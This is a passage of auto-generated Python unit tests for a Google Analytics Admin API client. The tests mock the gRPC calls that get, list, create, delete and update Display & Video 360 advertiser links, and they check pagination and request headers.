client.get_display_video360_advertiser_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_get_display_video360_advertiser_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.get_display_video360_advertiser_link( analytics_admin.GetDisplayVideo360AdvertiserLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.get_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.get_display_video360_advertiser_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_get_display_video360_advertiser_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.get_display_video360_advertiser_link( analytics_admin.GetDisplayVideo360AdvertiserLinkRequest(), name="name_value", ) def test_list_display_video360_advertiser_links( transport: str = "grpc", request_type=analytics_admin.ListDisplayVideo360AdvertiserLinksRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( next_page_token="next_page_token_value", ) response = client.list_display_video360_advertiser_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListDisplayVideo360AdvertiserLinksPager) assert response.next_page_token == "next_page_token_value" def test_list_display_video360_advertiser_links_from_dict(): test_list_display_video360_advertiser_links(request_type=dict) def test_list_display_video360_advertiser_links_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: client.list_display_video360_advertiser_links() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinksRequest() @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_async( transport: str = "grpc_asyncio", request_type=analytics_admin.ListDisplayVideo360AdvertiserLinksRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( next_page_token="next_page_token_value", ) ) response = await client.list_display_video360_advertiser_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.ListDisplayVideo360AdvertiserLinksRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListDisplayVideo360AdvertiserLinksAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_async_from_dict(): await test_list_display_video360_advertiser_links_async(request_type=dict) def test_list_display_video360_advertiser_links_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListDisplayVideo360AdvertiserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() client.list_display_video360_advertiser_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.ListDisplayVideo360AdvertiserLinksRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() ) await client.list_display_video360_advertiser_links(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_list_display_video360_advertiser_links_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.list_display_video360_advertiser_links(parent="parent_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" def test_list_display_video360_advertiser_links_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.list_display_video360_advertiser_links( analytics_admin.ListDisplayVideo360AdvertiserLinksRequest(), parent="parent_value", ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.list_display_video360_advertiser_links( parent="parent_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.list_display_video360_advertiser_links( analytics_admin.ListDisplayVideo360AdvertiserLinksRequest(), parent="parent_value", ) def test_list_display_video360_advertiser_links_pager(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], ), RuntimeError, ) metadata = () metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)), ) pager = client.list_display_video360_advertiser_links(request={}) assert pager._metadata == metadata results = [i for i in pager] assert len(results) == 6 assert all( isinstance(i, resources.DisplayVideo360AdvertiserLink) for i in results ) def test_list_display_video360_advertiser_links_pages(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__" ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], ), RuntimeError, ) pages = list(client.list_display_video360_advertiser_links(request={}).pages) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_async_pager(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], ), RuntimeError, ) async_pager = await client.list_display_video360_advertiser_links(request={},) assert async_pager.next_page_token == "abc" responses = [] async for response in async_pager: responses.append(response) assert len(responses) == 6 assert all( isinstance(i, resources.DisplayVideo360AdvertiserLink) for i in responses ) @pytest.mark.asyncio async def test_list_display_video360_advertiser_links_async_pages(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials, ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_display_video360_advertiser_links), "__call__", new_callable=mock.AsyncMock, ) as call: # Set the response to a series of pages. call.side_effect = ( analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], next_page_token="abc", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[], next_page_token="def", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), ], next_page_token="ghi", ), analytics_admin.ListDisplayVideo360AdvertiserLinksResponse( display_video_360_advertiser_links=[ resources.DisplayVideo360AdvertiserLink(), resources.DisplayVideo360AdvertiserLink(), ], ), RuntimeError, ) pages = [] async for page_ in ( await client.list_display_video360_advertiser_links(request={}) ).pages: pages.append(page_) for page_, token in zip(pages, ["abc", "def", "ghi", ""]): assert page_.raw_page.next_page_token == token def test_create_display_video360_advertiser_link( transport: str = "grpc", request_type=analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) response = client.create_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" def test_create_display_video360_advertiser_link_from_dict(): test_create_display_video360_advertiser_link(request_type=dict) def test_create_display_video360_advertiser_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: client.create_display_video360_advertiser_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) ) response = await client.create_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_async_from_dict(): await test_create_display_video360_advertiser_link_async(request_type=dict) def test_create_display_video360_advertiser_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: call.return_value = resources.DisplayVideo360AdvertiserLink() client.create_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) await client.create_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"] def test_create_display_video360_advertiser_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.create_display_video360_advertiser_link( parent="parent_value", display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[ 0 ].display_video_360_advertiser_link == resources.DisplayVideo360AdvertiserLink( name="name_value" ) def test_create_display_video360_advertiser_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.create_display_video360_advertiser_link( analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest(), parent="parent_value", display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), ) @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.create_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.create_display_video360_advertiser_link( parent="parent_value", display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].parent == "parent_value" assert args[ 0 ].display_video_360_advertiser_link == resources.DisplayVideo360AdvertiserLink( name="name_value" ) @pytest.mark.asyncio async def test_create_display_video360_advertiser_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.create_display_video360_advertiser_link( analytics_admin.CreateDisplayVideo360AdvertiserLinkRequest(), parent="parent_value", display_video_360_advertiser_link=resources.DisplayVideo360AdvertiserLink( name="name_value" ), ) def test_delete_display_video360_advertiser_link( transport: str = "grpc", request_type=analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None response = client.delete_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert response is None def test_delete_display_video360_advertiser_link_from_dict(): test_delete_display_video360_advertiser_link(request_type=dict) def test_delete_display_video360_advertiser_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: client.delete_display_video360_advertiser_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) response = await client.delete_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert response is None @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_async_from_dict(): await test_delete_display_video360_advertiser_link_async(request_type=dict) def test_delete_display_video360_advertiser_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: call.return_value = None client.delete_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest() request.name = "name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) await client.delete_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "name=name/value",) in kw["metadata"] def test_delete_display_video360_advertiser_link_flattened(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.delete_display_video360_advertiser_link(name="name_value",) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" def test_delete_display_video360_advertiser_link_flattened_error(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.delete_display_video360_advertiser_link( analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest(), name="name_value", ) @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_flattened_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.delete_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = None call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(None) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.delete_display_video360_advertiser_link( name="name_value", ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0].name == "name_value" @pytest.mark.asyncio async def test_delete_display_video360_advertiser_link_flattened_error_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.delete_display_video360_advertiser_link( analytics_admin.DeleteDisplayVideo360AdvertiserLinkRequest(), name="name_value", ) def test_update_display_video360_advertiser_link( transport: str = "grpc", request_type=analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) response = client.update_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" def test_update_display_video360_advertiser_link_from_dict(): test_update_display_video360_advertiser_link(request_type=dict) def test_update_display_video360_advertiser_link_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: client.update_display_video360_advertiser_link() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_async( transport: str = "grpc_asyncio", request_type=analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest, ): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( resources.DisplayVideo360AdvertiserLink( name="name_value", advertiser_id="advertiser_id_value", advertiser_display_name="advertiser_display_name_value", ) ) response = await client.update_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() # Establish that the response is the type that we expect. assert isinstance(response, resources.DisplayVideo360AdvertiserLink) assert response.name == "name_value" assert response.advertiser_id == "advertiser_id_value" assert response.advertiser_display_name == "advertiser_display_name_value" @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_async_from_dict(): await test_update_display_video360_advertiser_link_async(request_type=dict) def test_update_display_video360_advertiser_link_field_headers(): client = AnalyticsAdminServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() request.display_video_360_advertiser_link.name = ( "display_video_360_advertiser_link.name/value" ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_display_video360_advertiser_link), "__call__" ) as call: call.return_value = resources.DisplayVideo360AdvertiserLink() client.update_display_video360_advertiser_link(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "display_video_360_advertiser_link.name=display_video_360_advertiser_link.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_display_video360_advertiser_link_field_headers_async(): client = AnalyticsAdminServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = analytics_admin.UpdateDisplayVideo360AdvertiserLinkRequest() request.display_video_360_advertiser_link.name = ( "display_video_360_advertiser_link.name/value" ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( 